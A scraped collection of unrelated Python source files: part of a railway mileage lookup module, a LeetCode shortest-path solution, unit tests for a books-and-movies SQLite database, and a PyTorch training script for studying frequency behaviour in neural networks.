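# [Illustrative sketch, not part of the original record.]  search_conn() above
# locates the row of one ELR's mileage table that mentions the other ELR by
# scanning every column of every row, case-insensitively.  The masking idiom on a
# toy frame (column contents hypothetical):
import pandas as pd

em_df = pd.DataFrame({"Node": ["Bridge Jn", "Mill Lane AAM (0.18)"],
                      "Link_1_ELR": ["", "AAM"]})
mask = em_df.apply(lambda row: row.str.contains("AAM", case=False).any(), axis=1)
assert list(mask) == [False, True]  # only the second row references AAM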
note::\n\n This function may not be able to find the connection for every pair of ELRs.\n See :ref:`Example 2` below.\n\n :param start_elr: start ELR\n :type start_elr: str\n :param end_elr: end ELR\n :type end_elr: str\n :param update: whether to do an update check (for the package data), defaults to ``False``\n :type update: bool\n :param kwargs: [optional] parameters of the method\n :py:meth:`ELRMileages.fetch_mileage_file()\n `\n :return: connection ELR and mileages between the given ``start_elr`` and ``end_elr``\n :rtype: tuple\n\n **Example 1**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> conn = em.get_conn_mileages(start_elr='NAY', end_elr='LTN2')\n >>> (s_dest_mlg, c_elr, c_orig_mlg, c_dest_mlg, e_orig_mlg) = conn\n\n >>> s_dest_mlg\n '5.1606'\n >>> c_elr\n 'NOL'\n >>> c_orig_mlg\n '5.1606'\n >>> c_dest_mlg\n '0.0638'\n >>> e_orig_mlg\n '123.1320'\n\n .. _get_conn_mileages-example-2:\n\n **Example 2**::\n\n >>> from pyrcs.line_data import ELRMileages # from pyrcs import ELRMileages\n\n >>> em = ELRMileages()\n\n >>> conn = em.get_conn_mileages(start_elr='MAC3', end_elr='DBP1', dump_dir=\"tests\")\n >>> conn\n ('', '', '', '', '')\n \"\"\"\n\n kwargs.update({'update': update})\n\n start_file, end_file = map(\n functools.partial(self.fetch_mileage_file, **kwargs), [start_elr, end_elr])\n\n if start_file is not None and end_file is not None:\n start_elr, end_elr = start_file['ELR'], end_file['ELR']\n start_em, end_em = start_file['Mileage'], end_file['Mileage']\n key_pat = re.compile(r'(Current\\s)|(One\\s)|(Later\\s)|(Usual\\s)')\n\n if isinstance(start_em, dict):\n start_em = start_em[[k for k in start_em.keys() if re.match(key_pat, k)][0]]\n if isinstance(end_em, dict):\n end_em = end_em[[k for k in end_em.keys() if re.match(key_pat, k)][0]]\n\n start_dest_mileage, end_orig_mileage = self.search_conn(\n start_elr=start_elr, start_em=start_em, end_elr=end_elr, end_em=end_em)\n\n conn_elr, conn_orig_mileage, conn_dest_mileage = '', '', ''\n\n if not start_dest_mileage and not end_orig_mileage:\n link_cols = [x for x in start_em.columns if re.match(r'Link_\\d_ELR.?', x)]\n conn_elrs = start_em[link_cols]\n\n i = 0\n while i < len(link_cols):\n link_col = link_cols[i]\n conn_temp = conn_elrs[conn_elrs.astype(bool)].dropna(how='all')[link_col].dropna()\n\n j = 0\n while j < len(conn_temp):\n conn_elr = conn_temp.iloc[j]\n conn_em = self.fetch_mileage_file(elr=conn_elr, update=update)\n if conn_em is not None:\n conn_elr, conn_em = conn_em['ELR'], conn_em['Mileage']\n if isinstance(conn_em, dict):\n conn_em = conn_em[\n [k for k in conn_em.keys() if re.match(key_pat, k)][0]]\n\n start_dest_mileage, conn_orig_mileage = self.search_conn(\n start_elr, start_em, conn_elr, conn_em)\n\n conn_dest_mileage, end_orig_mileage = self.search_conn(\n conn_elr, conn_em, end_elr, end_em)\n\n if conn_dest_mileage and end_orig_mileage:\n if not start_dest_mileage:\n start_dest_mileage = start_em[\n start_em[link_col] == conn_elr]['Mileage'].values[0]\n if not conn_orig_mileage:\n link_col_conn = conn_em.where(conn_em == start_elr).dropna(\n axis=1, how='all').columns[0]\n temp = conn_em[conn_em[link_col_conn] == start_elr].Mileage\n conn_orig_mileage = temp.values[0]\n break\n\n else:\n conn_elr = ''\n j += 1\n\n if conn_elr != '':\n break\n # else:\n i += 1\n\n if conn_orig_mileage and not conn_elr:\n start_dest_mileage, conn_orig_mileage = '', ''\n\n else:\n start_dest_mileage, conn_elr, conn_orig_mileage, conn_dest_mileage, 
end_orig_mileage = \\\n [''] * 5\n\n return start_dest_mileage, conn_elr, conn_orig_mileage, conn_dest_mileage, end_orig_mileage\n","repo_name":"mikeqfu/pyrcs","sub_path":"pyrcs/line_data/elr_mileage.py","file_name":"elr_mileage.py","file_ext":"py","file_size_in_byte":55147,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"35571809399","text":"import collections\n\n\nclass Solution:\n def shortestPathBinaryMatrix(self, grid: List[List[int]]) -> int:\n rows, cols = len(grid), len(grid[0])\n\n if grid[0][0]:\n return -1\n\n visited = set()\n\n q = collections.deque()\n\n directions = [[0, 1], [1, 0], [0, -1], [-1, 0], [1, 1], [-1, 1], [1, -1], [-1, -1]]\n\n q.append((0, 0, 1))\n\n while q:\n r, c, count = q.popleft()\n\n if r == c == rows:\n return count\n\n for dr, dc in directions:\n next_r = r + dr\n next_c = c + dc\n if (next_r, next_c) not in visited and 0 <= next_r <= rows and 0 <= next_c <= cols and grid[next_r][\n next_c] == 0:\n visited.add(next_r, next_c)\n q.append((next_r, next_c, count + 1))\n\n return -1\n","repo_name":"pradeep288/leetcode-soln-python","sub_path":"google/16/1091_shortestPathBinaryMatrix.py","file_name":"1091_shortestPathBinaryMatrix.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"28085413009","text":"import unittest\nfrom final import *\n\n## All tests are done under the assumption that the database is filled with\n## the info from the sample search of preselected authors\n\n## it may take an abnormal amount of time to run if there is no cache saved\n\nclass TestAuthorTable(unittest.TestCase):\n\n def test_names(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Name\n FROM Authors\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Mike Lupica',), results_list)\n self.assertEqual(len(results_list), 10)\n\n def test_birth_dates(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT BirthDate\n FROM Authors\n WHERE Name=\"Hunter Thompson\"\n '''\n results = cur.execute(sql)\n result_list = results.fetchall()\n\n self.assertIn(('(1937-07-18)',), result_list)\n\n def test_alive(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Name\n FROM Authors\n WHERE DeathDate=\"Alive\"\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Stephen King',), results_list)\n self.assertEqual(len(results_list), 4)\n\nclass TestBookTable(unittest.TestCase):\n\n def test_total_books(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Title\n FROM Books\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Cujo',), results_list)\n self.assertEqual(len(results_list), 300)\n\n def test_book_from_author(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Title\n FROM Books\n WHERE AuthorId='3'\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Fear and Loathing in Las Vegas',), results_list)\n self.assertFalse('Cujo' in results_list)\n self.assertEqual(len(results_list), 30)\n\nclass TestMovieTable(unittest.TestCase):\n\n def test_total_movies(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Title\n FROM Movies\n '''\n results = cur.execute(sql)\n results_list = 
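# [Editorial sketch, not part of the original record.]  The shortestPathBinaryMatrix
# solution in the record above has several bugs as written: the goal test should be
# r == rows - 1 and c == cols - 1 (not r == c == rows), the bounds checks need
# strict < since indices run 0..rows-1, visited.add() takes one tuple rather than
# two arguments, and the start cell is never marked visited.  A corrected,
# self-contained version of the same BFS:
import collections


def shortest_path_binary_matrix(grid):
    rows, cols = len(grid), len(grid[0])
    if grid[0][0] or grid[rows - 1][cols - 1]:
        return -1
    directions = [(0, 1), (1, 0), (0, -1), (-1, 0),
                  (1, 1), (-1, 1), (1, -1), (-1, -1)]
    visited = {(0, 0)}
    q = collections.deque([(0, 0, 1)])  # (row, col, path length so far)
    while q:
        r, c, count = q.popleft()
        if r == rows - 1 and c == cols - 1:
            return count
        for dr, dc in directions:
            nr, nc = r + dr, c + dc
            if (0 <= nr < rows and 0 <= nc < cols
                    and (nr, nc) not in visited and grid[nr][nc] == 0):
                visited.add((nr, nc))
                q.append((nr, nc, count + 1))
    return -1


assert shortest_path_binary_matrix([[0, 1], [1, 0]]) == 2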
results.fetchall()\n\n self.assertIn(('Kurt Vonnegut: Unstuck in Time',), results_list)\n self.assertEqual(len(results_list), 31)\n\n def test_author_movies(self):\n conn = sqlite.connect(DBNAME)\n cur = conn.cursor()\n\n sql = '''\n SELECT Title\n FROM Movies\n WHERE AuthorId='1'\n '''\n results = cur.execute(sql)\n results_list = results.fetchall()\n\n self.assertIn(('Jack Kerouac Slept Here',), results_list)\n self.assertEqual(len(results_list), 6)\n\nsample_search(10)\nunittest.main()\n","repo_name":"rpdalka/SI_206_Final_Project","sub_path":"final_test.py","file_name":"final_test.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"6441038172","text":"import math\nimport os\nimport pickle\nimport platform\nimport shutil\nimport sys\nimport time\nimport warnings\nfrom datetime import datetime\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom matplotlib import cm\nfrom matplotlib.ticker import FormatStrFormatter, LinearLocator\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom torch.nn import init\n\nwarnings.filterwarnings(\"ignore\")\nmatplotlib.use(\"Agg\")\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3,4,5,6,7\"\nLeftp = 0.18\nBottomp = 0.18\nWidthp = 0.88 - Leftp\nHeightp = 0.9 - Bottomp\npos = [Leftp, Bottomp, Widthp, Heightp]\n\n\ndef mkdir(fn): # Create a directory\n if not os.path.isdir(fn):\n os.mkdir(fn)\n\n\ndef save_fig(pltm, fntmp, fp=0, ax=0, isax=0, iseps=0, isShowPic=0): # Save the figure\n if isax == 1:\n pltm.rc(\"xtick\", labelsize=18)\n pltm.rc(\"ytick\", labelsize=10)\n ax.set_position(pos, which=\"both\")\n fnm = \"%s.png\" % (fntmp)\n pltm.savefig(fnm)\n if iseps:\n fnm = \"%s.eps\" % (fntmp)\n pltm.savefig(fnm, format=\"eps\", dpi=600)\n if fp != 0:\n fp.savefig(\"%s.pdf\" % (fntmp), bbox_inches=\"tight\")\n if isShowPic == 1:\n pltm.show()\n elif isShowPic == -1:\n return\n else:\n pltm.close()\n\n\n# All parameters\nR = {}\nR[\"times\"] = 0.5 # initial\nR[\"input_dim\"] = 1\nR[\"output_dim\"] = 1\nR[\"ActFuc\"] = 1 # 0: ReLU; 1: Tanh; 2:Sin; 3:x**50; 4:Sigmoid\nR[\"hidden_units\"] = [100, 100]\n\nR[\"learning_rate\"] = 2e-4\nR[\"learning_rateDecay\"] = 5e-8\n\nplot_epoch = 500\nR[\"train_size\"] = 100\n\nR[\"test_size\"] = 100\nR[\"x_start\"] = -5\nR[\"x_end\"] = 5\nR[\"device\"] = \"0\"\nR[\"asi\"] = 0\nR[\"tuning_points\"] = []\nR[\"check_epoch\"] = 10 # find the tuning point\nR[\"tuning_ind\"] = []\nRy = {}\nRy[\"y_all\"] = []\nRw = {}\nRw[\"weight_R\"] = []\nlenarg = np.shape(sys.argv)[\n 0\n] # sys.argv is just a list whose items are the arguments supplied by the user; the key point is that they come from outside the program rather than from the code itself -- to see the effect, save the script and run it externally with arguments.\nif lenarg > 1:\n ilen = 1\n while ilen < lenarg:\n if sys.argv[ilen] == \"-m\":\n R[\"hidden_units\"] = [np.int32(sys.argv[ilen + 1])]\n if sys.argv[ilen] == \"-g\":\n R[\"device\"] = np.int32(sys.argv[ilen + 1])\n if sys.argv[ilen] == \"-t\":\n R[\"times\"] = np.float32(sys.argv[ilen + 1])\n if sys.argv[ilen] == \"-s\":\n R[\"train_size\"] = np.int32(sys.argv[ilen + 1])\n # if sys.argv[ilen]=='-lr':\n # R['learning_rate']=np.float32(sys.argv[ilen+1])\n # if sys.argv[ilen]=='-dir':\n # sBaseDir=sys.argv[ilen+1]\n ilen = ilen + 2\n\nR[\"hidden_units\"] = [200, 200, 200, 100] # overrides any -m value parsed above\nR[\"batch_size\"] = R[\"train_size\"]\nR[\"astddev\"] = 1 / (R[\"hidden_units\"][0] ** R[\"times\"])\nR[\"bstddev\"] = 1 / (R[\"hidden_units\"][0] **
R[\"times\"])\nR[\"full_net\"] = [R[\"input_dim\"]] + R[\"hidden_units\"] + [R[\"output_dim\"]]\n\nif R[\"input_dim\"] == 1:\n R[\"test_inputs\"] = np.reshape(\n np.linspace(\n R[\"x_start\"] - 0.5, R[\"x_end\"] + 0.5, num=R[\"test_size\"], endpoint=True\n ),\n [R[\"test_size\"], 1],\n )\n R[\"train_inputs\"] = np.reshape(\n np.linspace(R[\"x_start\"], R[\"x_end\"], num=R[\"train_size\"], endpoint=True),\n [R[\"train_size\"], 1],\n )\nelse:\n R[\"test_inputs\"] = (\n np.random.rand(R[\"test_size\"], R[\"input_dim\"]) * (R[\"x_end\"] - R[\"x_start\"])\n + R[\"x_start\"]\n )\n R[\"train_inputs\"] = (\n np.random.rand(R[\"train_size\"], R[\"input_dim\"]) * (R[\"x_end\"] - R[\"x_start\"])\n + R[\"x_start\"]\n )\n\n\ndef ReLU(x):\n return x * (x > 0)\n\n\n# def get_y(xs, sampleNo): # Function to fit\n# tmp = np.sin(xs)+np.sin(6*xs)\n# return tmp\n\n\ndef func0(xx):\n y_sin = np.sin(xx) + 2 * np.sin(3 * xx) + 3 * np.sin(5 * xx)\n return y_sin\n\n\ndef get_y(xx, alpha=1):\n y_sin = func0(xx)\n if alpha == 0:\n return y_sin\n out_y = np.round(y_sin / alpha)\n out_y2 = out_y * alpha\n return out_y2\n\n\ntest_inputs = R[\"test_inputs\"]\ntrain_inputs = R[\"train_inputs\"]\nR[\"y_true_train\"] = get_y(R[\"train_inputs\"])\n# Make a folder to save all output\nBaseDir_neu = \"test\"\nif platform.system() == \"Windows\":\n # device_n=\"0\"\n BaseDir0 = \"../../../nn/%s\" % (sBaseDir0)\n # BaseDir = '../../../nn/%s'%(sBaseDir)\nelse:\n # device_n=\"0\"\n # BaseDir0 = sBaseDir0\n # BaseDir = sBaseDir\n matplotlib.use(\"Agg\")\n# mkdir(BaseDir0)\n# BaseDir = '%s/%s' % (BaseDir0, example_folder)\n# mkdir(BaseDir)\n# BaseDir_a = '%s/%s' % (BaseDir, R['times'])\n# mkdir(BaseDir_a)\n# BaseDir_neu = '%s/%s' % (BaseDir_a, neu_ind_folder)\nmkdir(BaseDir_neu)\nsubFolderName = \"%s\" % (datetime.now().strftime(\"%y%m%d%H%M%S\"))\n# subFolderName = '%s'%(int(np.absolute(np.random.normal([1])*100000))//int(1))\n\n# subFolderName = '%s' % (\n# int(np.absolute(np.random.normal([1]) * 100000)) // int(1))\nFolderName = \"%s/%s/\" % (BaseDir_neu, subFolderName)\nmkdir(FolderName)\n\n# mkdir('%smodel/'%(FolderName))\n# print(subFolderName)\n\nif not platform.system() == \"Windows\":\n shutil.copy(__file__, \"%s%s\" % (FolderName, os.path.basename(__file__)))\n\ndevice = torch.device(\"cuda:%s\" % (R[\"device\"]) if torch.cuda.is_available() else \"cpu\")\n# device = torch.device(\"cpu\")\nprint(device)\n\n\ndef weights_init(m): # Initialization weight\n if isinstance(m, nn.Linear):\n m.weight.data.normal_(0, R[\"astddev\"])\n m.bias.data.normal_(0, R[\"bstddev\"])\n\n\nclass Act_op(nn.Module): # Custom activation function\n def __init__(self):\n super(Act_op, self).__init__()\n\n def forward(self, x):\n # return x ** 50 # or F.relu(x) * F.relu(1-x)\n return (F.relu(x)) ** 3\n\n\ndef getWini(\n hidden_units=[10, 20, 40],\n input_dim=1,\n output_dim_final=1,\n astddev=0.05,\n bstddev=0.05,\n):\n hidden_num = len(hidden_units)\n # print(hidden_num)\n add_hidden = [input_dim] + hidden_units\n\n w_Univ0 = []\n b_Univ0 = []\n\n for i in range(hidden_num):\n input_dim = add_hidden[i]\n output_dim = add_hidden[i + 1]\n ua_w = np.float32(\n np.random.normal(loc=0.0, scale=astddev, size=[input_dim, output_dim])\n )\n ua_b = np.float32(np.random.normal(loc=0.0, scale=bstddev, size=[output_dim]))\n w_Univ0.append(np.transpose(ua_w))\n b_Univ0.append(np.transpose(ua_b))\n ua_w = np.float32(\n np.random.normal(\n loc=0.0,\n scale=astddev,\n size=[hidden_units[hidden_num - 1], output_dim_final],\n )\n )\n ua_b = 
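# [Illustrative sketch, not part of the original record.]  get_y() above builds a
# staircase target: np.round(y / alpha) * alpha snaps the smooth signal func0 to
# the nearest multiple of alpha (alpha=0 skips the quantisation entirely).
# Worked example of the snapping step:
import numpy as np

y = np.array([0.3, 0.6, 1.4, -2.7])
assert list(np.round(y / 1.0) * 1.0) == [0.0, 1.0, 1.0, -3.0]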
np.float32(np.random.normal(loc=0.0, scale=bstddev, size=[output_dim_final]))\n w_Univ0.append(np.transpose(ua_w))\n b_Univ0.append(np.transpose(ua_b))\n return w_Univ0, b_Univ0\n\n\ndef my_fft(\n data, freq_len=40, x_input=np.zeros(10), kk=0, min_f=0, max_f=np.pi / 3, isnorm=1\n):\n second_diff_input = np.mean(np.diff(np.diff(np.squeeze(x_input))))\n if abs(second_diff_input) < 1e-10:\n datat = np.squeeze(data)\n datat_fft = np.fft.fft(datat)\n freq_len = min(freq_len, len(datat_fft))\n print(freq_len)\n ind2 = range(freq_len)\n fft_coe = datat_fft[ind2]\n if isnorm == 1:\n return_fft = np.absolute(fft_coe)\n else:\n return_fft = fft_coe\n else:\n return_fft = get_ft_multi(\n x_input,\n data,\n kk=kk,\n freq_len=freq_len,\n min_f=min_f,\n max_f=max_f,\n isnorm=isnorm,\n )\n return return_fft\n\n\ndef get_ft_multi(x_input, data, kk=0, freq_len=100, min_f=0, max_f=np.pi / 3, isnorm=1):\n n = x_input.shape[1]\n if np.max(abs(kk)) == 0:\n k = np.linspace(min_f, max_f, num=freq_len, endpoint=True)\n kk = np.matmul(np.ones([n, 1]), np.reshape(k, [1, -1]))\n tmp = np.matmul(np.transpose(data), np.exp(-1j * (np.matmul(x_input, kk))))\n if isnorm == 1:\n return_fft = np.absolute(tmp)\n else:\n return_fft = tmp\n return np.squeeze(return_fft)\n\n\ndef SelectPeakIndex(FFT_Data, endpoint=True):\n D1 = FFT_Data[1:-1] - FFT_Data[0:-2]\n D2 = FFT_Data[1:-1] - FFT_Data[2:]\n D3 = np.logical_and(D1 > 0, D2 > 0)\n tmp = np.where(D3 == True)\n sel_ind = tmp[0] + 1\n if endpoint:\n if FFT_Data[0] - FFT_Data[1] > 0:\n sel_ind = np.concatenate([[0], sel_ind])\n if FFT_Data[-1] - FFT_Data[-2] > 0:\n Last_ind = len(FFT_Data) - 1\n sel_ind = np.concatenate([sel_ind, [Last_ind]])\n return sel_ind\n\n\nR[\"n_fixed\"] = 0\n\nmin_n = np.min([R[\"n_fixed\"], R[\"hidden_units\"][0]])\nR[\"n_fixed\"] = min_n\n# print(min_n)\nw_Univ0, b_Univ0 = getWini(\n hidden_units=R[\"hidden_units\"],\n input_dim=R[\"input_dim\"],\n output_dim_final=R[\"output_dim\"],\n astddev=R[\"astddev\"],\n bstddev=R[\"bstddev\"],\n)\n\nprint(np.shape(w_Univ0[0]))\nprint(np.shape(b_Univ0[0]))\n\n\nclass Network(nn.Module): # DNN 0: ReLU; 1: Tanh; 2:Sin; 3:x**50; 4:Sigmoid\n def __init__(self):\n super(Network, self).__init__()\n self.block3 = nn.Sequential()\n self.block = nn.Sequential()\n for i in range(len(R[\"full_net\"]) - 2):\n d_linear = nn.Linear(R[\"full_net\"][i], R[\"full_net\"][i + 1])\n print(\"weight1: start\")\n print(np.shape(d_linear.weight.data.numpy()))\n print(\"weight1: end\")\n d_linear.weight.data = torch.nn.Parameter(torch.tensor(w_Univ0[i]))\n d_linear.bias.data = torch.nn.Parameter(torch.tensor(b_Univ0[i]))\n # print(d_linear.weight)\n print(\"weight2: start\")\n print(np.shape(d_linear.weight.data.numpy()))\n print(\"weight2: end\")\n self.block3.add_module(\"linear\" + str(i), d_linear)\n\n self.block.add_module(\"linear\" + str(i), d_linear)\n if R[\"ActFuc\"] == 0:\n self.block.add_module(\"relu\" + str(i), nn.ReLU())\n self.block3.add_module(\"relu\" + str(i), nn.ReLU())\n elif R[\"ActFuc\"] == 1:\n self.block.add_module(\"tanh\" + str(i), nn.Tanh())\n self.block3.add_module(\"tanh\" + str(i), nn.Tanh())\n elif R[\"ActFuc\"] == 3:\n self.block.add_module(\"relu3\" + str(i), Act_op())\n self.block3.add_module(\"relu3\" + str(i), Act_op())\n i = len(R[\"full_net\"]) - 2\n d_linear = nn.Linear(R[\"full_net\"][i], R[\"full_net\"][i + 1], bias=False)\n d_linear.weight.data = torch.nn.Parameter(torch.tensor(w_Univ0[i]))\n # d_linear.bias.data = torch.nn.Parameter(torch.tensor(b_Univ0[i]))\n 
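# [Illustrative sketch, not part of the original record.]  SelectPeakIndex() above
# marks local maxima of an FFT magnitude by requiring each interior sample to
# exceed both neighbours (D1 > 0 and D2 > 0), with optional endpoint handling.
# Toy check of the same discrete test:
import numpy as np

spectrum = np.array([0.1, 1.0, 0.2, 0.3, 2.0, 0.4])
d1 = spectrum[1:-1] - spectrum[:-2]
d2 = spectrum[1:-1] - spectrum[2:]
assert list(np.where((d1 > 0) & (d2 > 0))[0] + 1) == [1, 4]  # peaks at 1.0 and 2.0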
self.block.add_module(\"linear\" + str(i), d_linear)\n if R[\"asi\"]:\n self.block2 = nn.Sequential()\n for i in range(len(R[\"full_net\"]) - 2):\n d_linear = nn.Linear(R[\"full_net\"][i], R[\"full_net\"][i + 1])\n print(\"weight1: start\")\n print(np.shape(d_linear.weight.data.numpy()))\n print(\"weight1: end\")\n d_linear.weight.data = torch.nn.Parameter(torch.tensor(w_Univ0[i]))\n d_linear.bias.data = torch.nn.Parameter(torch.tensor(b_Univ0[i]))\n # print(d_linear.weight)\n print(\"weight2: start\")\n print(np.shape(d_linear.weight.data.numpy()))\n print(\"weight2: end\")\n # d_linear.weight.data = torch.tensor(w_Univ0[i])\n # d_linear.bias.data = torch.tensor(b_Univ0[i])\n self.block2.add_module(\"linear2\" + str(i), d_linear)\n if R[\"ActFuc\"] == 0:\n self.block2.add_module(\"relu2\" + str(i), nn.ReLU())\n elif R[\"ActFuc\"] == 1:\n self.block2.add_module(\"tanh2\" + str(i), nn.Tanh())\n elif R[\"ActFuc\"] == 2:\n self.block2.add_module(\"sin2\" + str(i), nn.sin())\n elif R[\"ActFuc\"] == 3:\n self.block2.add_module(\"**502\" + str(i), Act_op())\n elif R[\"ActFuc\"] == 4:\n self.block2.add_module(\"sigmoid2\" + str(i), nn.sigmoid())\n i = len(R[\"full_net\"]) - 2\n d_linear = nn.Linear(R[\"full_net\"][i], R[\"full_net\"][i + 1], bias=False)\n d_linear.weight.data = torch.nn.Parameter(torch.tensor(-w_Univ0[i]))\n d_linear.bias.data = torch.nn.Parameter(torch.tensor(-b_Univ0[i]))\n self.block2.add_module(\"linear2\" + str(i), d_linear)\n\n def forward(self, x):\n if R[\"asi\"]:\n out = self.block(x) + self.block2(x)\n else:\n out = self.block(x)\n return out\n\n def hidden(self, x):\n out = self.block3(x)\n return out\n\n\nclass Model:\n def __init__(self):\n\n # y_train = net_(torch.FloatTensor(train_inputs).to(device))\n y_train = net_(torch.FloatTensor(train_inputs).to(device))\n loss_train = float(\n criterion(y_train.cpu(), torch.FloatTensor(R[\"y_true_train\"])).cpu()\n )\n y_test = net_(torch.FloatTensor(test_inputs).to(device))\n # loss_test = float(criterion(y_test.cpu(), torch.FloatTensor(R['y_true_test'])).cpu())\n\n nametmp = \"%smodel/\" % (FolderName)\n mkdir(nametmp)\n torch.save(net_.state_dict(), \"%smodel.ckpt\" % (nametmp))\n\n R[\"y_train\"] = y_train.cpu().detach().numpy()\n R[\"y_test\"] = y_test.cpu().detach().numpy()\n # self.record_weight()\n\n R[\"loss_train\"] = [loss_train]\n\n def run_onestep(self, optimizer):\n\n y_test = net_(torch.FloatTensor(test_inputs).to(device))\n # loss_test = float(criterion(y_test, torch.FloatTensor(R['y_true_test']).to(device)).cpu())\n y_train = net_(torch.FloatTensor(train_inputs).to(device))\n loss_train = float(\n criterion(y_train, torch.FloatTensor(R[\"y_true_train\"]).to(device)).cpu()\n )\n\n R[\"y_train\"] = y_train.cpu().detach().numpy()\n R[\"y_test\"] = y_test.cpu().detach().numpy()\n R[\"loss_train\"].append(loss_train)\n\n # optimizer = torch.optim.SGD(\n # net_.parameters(), lr=R['learning_rate'], momentum=0.)\n\n for i in range(R[\"train_size\"] // R[\"batch_size\"] + 1): # bootstrap\n\n mask = np.random.choice(R[\"train_size\"], R[\"batch_size\"], replace=False)\n y_train = net_(torch.FloatTensor(train_inputs[mask]).to(device))\n loss = criterion(\n y_train, torch.FloatTensor(R[\"y_true_train\"][mask]).to(device)\n )\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n R[\"learning_rate\"] = R[\"learning_rate\"] * (1 - R[\"learning_rateDecay\"])\n\n # def record_weight(self):\n # if R['hidden_units'][0] == 1:\n # tmp_w1 = np.squeeze(net_.block[0].weight.cpu().detach().numpy())\n # tmp_b1 = 
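# [Editorial note and sketch, not part of the original record.]  Two observations
# on the Network class above.  First, the R["asi"] branch is an antisymmetrical
# initialisation: block2 copies block's hidden-layer weights but negates the final
# linear weights, so block(x) + block2(x) is identically zero at initialisation.
# Second, torch.nn has no nn.sin or nn.sigmoid module, so the ActFuc == 2 and
# ActFuc == 4 branches would raise AttributeError as written: nn.Sigmoid() exists,
# and a sine activation needs a small wrapper such as the one below; similarly, a
# Linear built with bias=False has bias None, so assigning to its .bias.data fails.
import torch
import torch.nn as nn


class Sin(nn.Module):
    # Minimal sine activation module, one possible fix for the ActFuc == 2 branch.
    def forward(self, x):
        return torch.sin(x)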
np.squeeze(net_.block[0].bias.cpu().detach().numpy())\n # tmp_w2 = np.squeeze(net_.block[2].weight.cpu().detach().numpy())\n # tmp_w = [tmp_w1, tmp_b1, tmp_w2]\n # else:\n # tmp_w1 = np.squeeze(net_.block[0].weight.cpu().detach().numpy())\n # tmp_b1 = np.squeeze(net_.block[0].bias.cpu().detach().numpy())\n # tmp_w2 = np.squeeze(net_.block[2].weight.cpu().detach().numpy())\n # # tmp_w2=np.squeeze(net_.block[2].weight.cpu().detach().numpy())[0:R['n_fixed']]\n # tmp_w = np.concatenate((tmp_w1, tmp_b1, tmp_w2), axis=0)\n # Rw['weight_R'].append(tmp_w)\n\n def run(self, step_n=1):\n\n # Load paremeters\n nametmp = \"%smodel/model.ckpt\" % (FolderName)\n net_.load_state_dict(torch.load(nametmp))\n net_.eval()\n optimizer = torch.optim.Adam(net_.parameters(), lr=2e-4)\n\n for epoch in range(step_n):\n\n self.run_onestep(optimizer)\n # self.record_weight()\n Ry[\"y_all\"].append(R[\"y_train\"])\n\n if epoch % plot_epoch == 0:\n\n print(\"time elapse: %.3f\" % (time.time() - t0))\n print(\"model, epoch: %d, train loss: %f\" % (epoch, R[\"loss_train\"][-1]))\n self.plot_loss()\n self.plot_y(name=\"%s\" % (epoch))\n self.save_file()\n\n if R[\"loss_train\"][-1] < 1e-5:\n break\n\n def plot_weight(self):\n weight_R = np.stack(Rw[\"weight_R\"])\n plt.figure()\n for i_sub in range(R[\"n_fixed\"]):\n # print(i_sub)\n for ji in range(3):\n # print('%s'%(3*i_sub+ji))\n ax = plt.subplot(R[\"n_fixed\"], 3, 3 * i_sub + ji + 1)\n ax.plot(abs(weight_R[:, ji * R[\"n_fixed\"] + i_sub]))\n plt.title(\"%s\" % (3 * i_sub + ji))\n ax.set_xscale(\"log\")\n ax.set_yscale(\"log\")\n ax.set_ylim([5e-2, 1e1])\n # ax.axis('off')\n # ax.text(-0.5,1,'%.2f'%(output_weight[i_sub]))\n\n # ax.set_xscale('log')\n # ax.set_yscale('log')\n # plt.legend(fontsize=18)\n # plt.title('loss',fontsize=15)\n # fntmp = '%shiddeny%s'%(FolderName,epoch)\n fntmp = \"%sweightevolve\" % (FolderName)\n save_fig(plt, fntmp, iseps=0)\n\n def plot_loss(self):\n\n plt.figure()\n ax = plt.gca()\n # y1 = R['loss_test']\n y2 = np.asarray(R[\"loss_train\"])\n # plt.plot(y1,'ro',label='Test')\n plt.plot(y2, \"k-\", label=\"Train\")\n if len(R[\"tuning_ind\"]) > 0:\n plt.plot(R[\"tuning_ind\"], y2[R[\"tuning_ind\"]], \"r*\")\n ax.set_xscale(\"log\")\n ax.set_yscale(\"log\")\n plt.legend(fontsize=18)\n plt.title(\"loss\", fontsize=15)\n fntmp = \"%sloss\" % (FolderName)\n save_fig(plt, fntmp, ax=ax, isax=1, iseps=0)\n\n def plot_tuning(self):\n plt.figure()\n ax = plt.gca()\n y2 = R[\"y_true_train\"]\n plt.plot(train_inputs, y2, \"b*\", label=\"True\")\n for iit in range(len(R[\"y_tuning\"])):\n plt.plot(\n test_inputs,\n R[\"y_tuning\"][iit],\n \"-\",\n label=\"%.3f\" % (R[\"loss_tuning\"][iit]),\n )\n plt.title(\"turn points\", fontsize=15)\n plt.legend(fontsize=18)\n fntmp = \"%sturn\" % (FolderName)\n save_fig(plt, fntmp, ax=ax, isax=1, iseps=0)\n\n def plot_y(self, 